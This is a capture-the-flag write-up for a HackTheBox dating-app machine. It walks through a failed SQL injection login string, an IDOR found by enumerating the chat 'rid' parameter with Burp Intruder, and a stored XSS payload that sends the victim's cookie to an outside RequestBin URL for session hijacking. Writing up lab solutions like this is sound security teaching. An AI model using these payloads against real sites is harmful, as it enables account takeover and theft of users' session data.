Write-up

Step-by-step guide on the approach taken to pwn the machine.

Objective

In this machine, the goal is to "find the flag."

Reconnaissance

The first thing we do is navigate to the URL provided by HackTheBox:

http://83.136.250.243:49280

Upon entering, we are greeted with a login form. Our first attempt is to perform a SQL Injection (SQLI).

We input the following into the username field:

admin’
OR+1=1-- -

However, we are redirected back, so we decide to try creating an account instead.

Exploitation

After creating an account, we notice that we are taken to a profile page with the name Etela. The application appears to be a dating platform, similar to Tinder, and the URL changes to:

/dashboard

We start interacting with the application by liking all the profiles. After the fourth profile, no more profiles appear. At this point, we decide to check the "matches" section.

It turns out that we have a match with Renata, and there is already a message. What catches our attention is the URL:

http://83.136.250.243:49280/chat/?rid=6

Could this be an Insecure Direct Object Reference (IDOR) vulnerability? We test changing the rid parameter from 6 to other numbers.

IDOR with Burp Suite

This looks promising. We use Burp Suite Intruder to automate the attack. First, we create a Python script to generate the first 100 integers into a file:

sudo vim 1to100.py
with open("1to100.txt", "w") as file:
    for i in range(101):
        file.write(f"{i}\n")
print("se ha guardado la lista de números en '1to100.txt'.")

Explanation:

  • with open("1to100.txt", "w") as file: Opens the file 1to100.txt for writing. If it doesn't exist, it's created.

  • for i in range(101): Loops through numbers from 0 to 100.

  • file.write(f"{i}\n"): Writes each number to the file with a newline.

After running the script:

python3 1to100.py

We now have the 1to100.txt file ready to use in Burp Suite.

Setting Up Burp Suite Intruder

We intercept the GET request for the chat URL using Burp Suite.

  1. Open Burp Suite and go to the Proxy tab.

  2. With intercept activated, we reload the page in Firefox (ensure FoxyProxy is configured properly).

  3. Right-click on the request and select Send to Intruder.

In the Intruder tab, we configure the attack:

  • We set the payload position to replace the rid parameter by selecting it in the request.

  • Choose the Sniper attack type.

  • Under Payload Configuration, we load our previously generated 1to100.txt file.

Click Start Attack.

Analyzing Result

As the attack runs, we see the results updating in real-time. To make it easier to identify relevant responses, we sort by Status code.

We observe only two status codes 200:

  • The first is 6, which corresponds to our chat.

  • The second is 3, which seems promising. We navigate to the following URL:

http://83.136.250.243:49280/chat/?rid=3

Here, we find the flag!

Additional Exploits: Cookie and JavaScript Injection

While this concludes the challenge, there’s something else worth testing. Upon inspecting the requests, we see a session cookie is sent.

We decide to send Renata a message and observe the response. Interestingly, Renata replies with a generic message, but we try injecting HTML into the message to see how the application handles it.

To our surprise, the application processes the HTML and JS and responds. We now attempt a JavaScript injection:

<script>document.location='http://requestbin.whapi.cloud/?c=' + document.cookie</script>

We use RequestBin to capture the request. After sending the message, we are redirected to the RequestBin URL, and it shows an ok status.

We refresh the RequestBin page and see that the cookies are now logged. We copy Renata’s cookie.

To confirm the correct cookie, we open the console in the browser and execute:

document.cookie

This gives us our own cookie. We replace it with Renata’s cookie, then reload the OnlyHacks page.

The flag is now visible!

PreviousOnlyHacksNextTechnical Report

Last updated